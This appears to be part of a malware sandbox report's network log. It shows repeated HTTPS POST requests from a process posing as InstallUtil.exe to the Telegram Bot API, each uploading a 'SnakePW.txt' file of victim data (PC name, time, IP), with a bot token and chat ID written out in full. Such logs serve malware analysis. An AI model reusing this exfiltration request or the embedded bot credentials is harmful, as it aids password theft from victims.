                                                                                    Data Ascii: {"ok":true,"result":{"message_id":146,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765205


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    47192.168.2.550033149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:46 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd38c9a877762d
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:46 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 38 63 39 61 38 37 37 37 36 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd38c9a877762dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:46 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:46 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:46 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 30 36
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":147,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765206


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    48192.168.2.550034149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:47 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3913f002f65b
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:47 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 39 31 33 66 30 30 32 66 36 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3913f002f65bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:47 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:47 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:47 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 30 37
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":148,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765207


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    49192.168.2.550035149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:48 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd395f6e41e0ec
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:48 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 39 35 66 36 65 34 31 65 30 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd395f6e41e0ecContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:48 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:48 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:48 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 30 38
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":149,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765208


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    50192.168.2.550036149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:49 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd39aa76d1b34f
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:49 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 39 61 61 37 36 64 31 62 33 34 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd39aa76d1b34fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:50 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:49 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:50 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 30 39
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":150,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765209


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    51192.168.2.550037149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:50 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3a02fbe2a2f5
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:50 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 61 30 32 66 62 65 32 61 32 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3a02fbe2a2f5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:51 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:51 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:51 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 31 31
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":151,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765211


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    52192.168.2.550038149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:51 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3a4b31890c92
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:51 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 61 34 62 33 31 38 39 30 63 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3a4b31890c92Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:52 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:52 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:52 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 31 32
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":152,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765212


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    53192.168.2.550039149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:52 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3a9ad859f284
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:52 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 61 39 61 64 38 35 39 66 32 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3a9ad859f284Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:53 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:53 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:53 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 31 33
